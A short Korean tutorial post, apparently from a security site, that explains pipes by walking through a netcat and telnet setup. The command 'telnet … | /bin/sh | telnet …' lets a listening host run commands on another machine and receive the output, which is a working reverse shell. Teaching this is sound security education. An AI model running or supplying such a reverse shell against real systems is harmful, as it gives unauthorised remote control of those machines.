어떻게 할까요? 강좌만 읽는 분들 BBS에 글 남기세요. s[ㅡヘㅡ]z

먼저 아래의 nc 에 대해서 잘 읽어 보시구요. 사용해 본다음 해보세요.

A에서 B로 접속을 하는데 B에서 A로 명령을 내리는 겁니다.

A(211.211.211.211) --------> B (211.211.211.212)

B에서 창을 2개를 띄워서 nc를 2개를 띄워 놓습니다.

첫번째 창
$ nc -l -p 3456

두번째 창
$ nc -l -p 7890

이렇게 해놓은 다음

A에서 이렇게 명령을 내립니다.

$ telnet 211.211.211.212 3456 | /bin/sh |telnet 211.211.211.212 7890

이렇게 한다음

B의 첫번째 창에서 ls 라고 한번 쳐보세요. 아무 반응이 없지요. ^^

이때 B의 두번째 창을 봐 보세요. 결과는 거기에 나타납니다.

신기 하지요. ^^

왜 저렇게 하면 이런 현상이 나오는지 파이프에 대해서 곰곰히 생각해 보세요.

이글은 출처(http://security.xmecca.com)를 알려주시면 어느 곳에나 쓸 수 있습니다.

Trackback 0 Comment 0